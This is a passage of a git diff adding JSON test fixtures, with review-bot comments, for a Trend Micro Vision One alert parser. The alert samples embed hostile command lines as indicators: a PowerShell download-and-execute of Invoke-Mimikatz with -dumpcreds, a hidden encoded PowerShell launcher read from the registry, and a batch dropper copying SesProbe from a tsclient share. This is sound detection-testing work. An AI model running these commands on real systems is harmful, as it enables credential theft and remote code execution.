+ "user": [
+ "doe"
+ ]
+ },
+ "rule": {
+ "name": "Internal Network Scanner"
+ },
+ "trendmicro": {
+ "vision_one": {
+ "alert_id": "WB-11111-22222222-00000",
+ "investigation_status": "New",
+ "severity": "low",
+ "status": "Open"
+ }
+ },
+ "user": {
+ "domain": "john",
+ "id": "john\\doe",
+ "name": "doe"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_process.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_process.json
new file mode 100644
index 000000000..3c77d1afd
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_process.json
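Review bot: `related.user` in `expected` lists only `doe` although the input carries a second `user_account` indicator (id 8, value `Système`, empty `field`, provenance `Related Asset Enrichment`), so the fixture pins that a user_account indicator without a `field` is silently dropped; ECS `related.*` exists to collect every such value for pivoting, so either include it or state the exclusion rule in the parser's documentation. That value also looks like the localized display name of the built-in system account rather than a SID, which is worth remembering before anyone writes a rule matching on it. Separately, `event.url` keeps the `?ref=7ddf32e17a6ac5ce04a8ecbf782ca509` query string from `workbenchLink` whereas the other fixtures' URLs are bare; if `ref` is a per-click tracking parameter rather than part of the alert identity, stripping it would keep `event.url` comparable across alerts, though that cannot be decided from the fixture alone.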
@@ -0,0 +1,73 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00023\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Credential Dumping via Mimikatz\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"createdDateTime\": \"2022-09-06T02:49:30Z\", \"updatedDateTime\": \"2022-09-06T02:49:50Z\", \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user obtained account logon information that can be used to access remote systems via Mimikatz.\", \"matchedRules\": [{\"id\": \"1288958d-3062-4a75-91fc-51b2a49bc7d7\", \"name\": \"Potential Credential Dumping via Mimikatz\", \"matchedFilters\": [{\"id\": \"49d327c4-361f-43f0-b66c-cab433495e42\", \"name\": \"Possible Credential Dumping via Mimikatz\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"mitreTechniqueIds\": [\"V9.T1003.001\", \"V9.T1059.003\", \"V9.T1212\"], 
\"matchedEvents\": [{\"uuid\": \"e168a6e5-27b1-462b-ad3e-5146df4e6aa5\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe \\\"iex (new-object net.webclient).downloadstring(\\\" \\\"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\\\"\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\\\microsoft\\\\windows update).update); powershell -nop -noni -w hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha1\", \"field\": \"objectFileHashSha1\", \"value\": \"1B3B40FBC889FD4C645CC12C85D0805AC36BA254\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": 
[\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Nimda\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00023\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Credential Dumping via Mimikatz\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"createdDateTime\": \"2022-09-06T02:49:30Z\", \"updatedDateTime\": \"2022-09-06T02:49:50Z\", \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", 
\"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user obtained account logon information that can be used to access remote systems via Mimikatz.\", \"matchedRules\": [{\"id\": \"1288958d-3062-4a75-91fc-51b2a49bc7d7\", \"name\": \"Potential Credential Dumping via Mimikatz\", \"matchedFilters\": [{\"id\": \"49d327c4-361f-43f0-b66c-cab433495e42\", \"name\": \"Possible Credential Dumping via Mimikatz\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"mitreTechniqueIds\": [\"V9.T1003.001\", \"V9.T1059.003\", \"V9.T1212\"], \"matchedEvents\": [{\"uuid\": \"e168a6e5-27b1-462b-ad3e-5146df4e6aa5\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe \\\"iex (new-object net.webclient).downloadstring(\\\" \\\"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\\\"\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\\\microsoft\\\\windows 
update).update); powershell -nop -noni -w hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha1\", \"field\": \"objectFileHashSha1\", \"value\": \"1B3B40FBC889FD4C645CC12C85D0805AC36BA254\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Nimda\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Credential Dumping via Mimikatz", + "type": [ + "info" + ], + "url": "https://THE_WORKBENCH_URL" + }, + "@timestamp": "2022-09-06T02:49:30Z", + "file": { + "directory": "c:\\windows\\system32\\windowspowershell\\v1.0", + "hash": { + "sha1": "1B3B40FBC889FD4C645CC12C85D0805AC36BA254" + }, + "name": "powershell.exe", + "path": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" + }, + "host": { + "id": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", + "ip": [ + "10.10.58.51" + ], + "name": "nimda" + }, + "observer": { + "product": "Vision 
One",
+ "vendor": "TrendMicro"
+ },
+ "process": {
+ "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=",
+ "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
+ "parent": {
+ "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\microsoft\\windows update).update); powershell -nop -noni -w hidden -enc $x"
+ }
+ },
+ "related": {
+ "hash": [
+ "1B3B40FBC889FD4C645CC12C85D0805AC36BA254"
+ ],
+ "ip": [
+ "10.10.58.51"
+ ],
+ "user": [
+ "sam"
+ ]
+ },
+ "rule": {
+ "name": "Credential Dumping via Mimikatz"
+ },
+ "trendmicro": {
+ "vision_one": {
+ "alert_id": "WB-9002-20220906-00023",
+ "investigation_status": "New",
+ "severity": "high",
+ "status": "Open"
+ }
+ },
+ "user": {
+ "domain": "shockwave",
+ "id": "shockwave\\sam",
+ "name": "sam"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_project_injection.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_project_injection.json
new file mode 100644
index 000000000..a95ac7fc8
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_project_injection.json
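Review bot: The `expected` block of test_process.json never asserts the ATT&CK technique IDs the alert carries (`mitreTechniqueIds` `V9.T1003.001`, `V9.T1059.003`, `V9.T1212` under `matchedFilters`), so the fixture gives no coverage of `threat.technique.id`, which is where ECS consumers and correlation rules look for the technique mapping. If the parser is meant to surface them, the expected output should gain something like `"threat": { "technique": { "id": ["T1003.001", "T1059.003", "T1212"] } }`; whether the parser strips the `V9.` version prefix is not visible in this diff, so the exact expected strings need confirming against the parser. The vendor `score` (64) is likewise absent from `expected`, so only the string level in `trendmicro.vision_one.severity` is pinned and a regression in any numeric severity mapping would pass this test unnoticed. Note also that only the first matched filter name (`Possible Credential Dumping via Mimikatz`) differs from the `model` name used for `rule.name`, and nothing in `expected` records the filter-level detection name, which is the more specific identifier for triage.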
@@ -0,0 +1,77 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"bec297c0-7e55-488e-b02a-192a87069661\", \"model\": \"Process Injection from Windows Temporary Location to System32\", \"modelType\": \"preset\", \"score\": 51, \"severity\": \"medium\", \"createdDateTime\": \"2024-07-23T07:49:48Z\", \"updatedDateTime\": \"2024-07-23T07:49:59Z\", \"ownerIds\": [], \"incidentId\": \"IC-14558-20240722-00000\", \"impactScope\": {\"desktopCount\": 14, \"serverCount\": 1, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"name\": \"CHTX-XMEDICA-2K12.windows10.local\", \"ips\": [\"19.112.87.74\"]}, \"entityId\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"name\": \"PRESTATAIR-2K19\", \"ips\": [\"1.231.184.40\"]}, \"entityId\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": 
\"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"name\": \"\", \"ips\": [\"\"]}, \"entityId\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"name\": \"XBURN-2K16\", \"ips\": [\"248.131.28.153\"]}, \"entityId\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"name\": \"LB-XMEDICA-2K12\", \"ips\": [\"247.47.158.155\"]}, \"entityId\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"name\": \"C2583-SCLITE1-2\", \"ips\": [\"174.76.164.124\"]}, \"entityId\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"name\": \"MONECHO-2K22\", \"ips\": [\"236.2.20.78\"]}, \"entityId\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"name\": \"DXRECUP-2K19-T.windows10.local\", \"ips\": 
[\"fe80::cd06:59d9:574d:d989%14\"]}, \"entityId\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"name\": \"XMEDPRINT-2K19\", \"ips\": [\"89.67.140.152\"]}, \"entityId\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"name\": \"SCR-2K16\", \"ips\": [\"156.39.139.182\"]}, \"entityId\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"48c7d9d7-54b0-4d1b-8150-3a1657a303d8\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"name\": \"ANTARES-2K16\", \"ips\": [\"82.9.180.60\"]}, \"entityId\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"name\": \"SATIS-2K22\", \"ips\": [\"237.154.233.153\"]}, \"entityId\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"name\": \"COPILOTE-TEST.windows10.local\", \"ips\": [\"172.39.11.166\"]}, \"entityId\": \"673794B3-E11C-4992-8713-6CC954D64E21\", 
\"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"name\": \"NEWAC-LB-2K22.windows10.local\", \"ips\": [\"fe80::87e9:927d:58dd:d66c%5\"]}, \"entityId\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"name\": \"BI4-2K22.windows10.local\", \"ips\": [\"96.70.247.104\"]}, \"entityId\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}]}, \"description\": \"Detects possible unauthorized windows system process modification from a process running in Windows temporary locations\", \"matchedRules\": [{\"id\": \"34885eaa-08ba-4efc-ae46-70663dba0804\", \"name\": \"Process Injection from Windows Temporary Location to System32\", \"matchedFilters\": [{\"id\": \"1aeea7bb-9b05-4dff-af2b-30027e53bb15\", \"name\": \"Process Injection To System32 Executable via CMD\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055.012\", \"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}, {\"id\": \"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\", \"name\": \"Cross-Process Injection by Process from Temporary Locations\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", 
\"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": 
\"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", 
